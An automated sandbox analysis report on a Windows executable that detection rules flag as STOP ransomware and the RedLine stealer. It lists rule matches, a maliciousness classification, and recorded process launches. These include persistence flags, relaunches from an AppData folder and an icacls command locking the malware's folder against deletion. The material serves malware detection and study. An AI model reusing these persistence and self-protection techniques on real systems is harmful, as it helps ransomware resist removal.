        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 972, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6628, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6292, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@18/733@2/2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_021787C6 CreateToolhelp32Snapshot,Module32First,0_2_021787C6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F100 EnumTimeFormatsW,DebugActiveProcessStop,EnterCriticalSection,CopyFileExW,IsBadReadPtr,GetConsoleMode,FlushConsoleInputBuffer,LoadResource,GetConsoleOutputCP,AddConsoleAliasW,0_2_0041F100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].jsonJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: kernel32.dll0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: LocalAlloc0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --ForNetRes2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Task2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --AutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Service2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: X1P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: runas2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: x2Q2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: x*P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: C:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: D:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: 7P2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: %username%2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCommand line argument: F:\2_2_00419F90
        Source: tsnsd8pOvn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: wct425E.tmp.7.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: wct425E.tmp.7.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: tsnsd8pOvn.exeReversingLabs: Detection: 86%
        Source: tsnsd8pOvn.exeString found in binary or memory: set-addPolicy
        Source: tsnsd8pOvn.exeString found in binary or memory: id-cmc-addExtensions
        Source: tsnsd8pOvn.exeString found in binary or memory: set-addPolicy
        Source: tsnsd8pOvn.exeString found in binary or memory: id-cmc-addExtensions
        Source: tsnsd8pOvn.exeString found in binary or memory: set-addPolicy
        Source: tsnsd8pOvn.exeString found in binary or memory: id-cmc-addExtensions
        Source: tsnsd8pOvn.exeString found in binary or memory: set-addPolicy
        Source: tsnsd8pOvn.exeString found in binary or memory: id-cmc-addExtensions
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile read: C:\Users\user\Desktop\tsnsd8pOvn.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
        Source: unknownProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
        Source: unknownProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: unknownProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"Jump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --TaskJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: profapi.dllJump to behavior
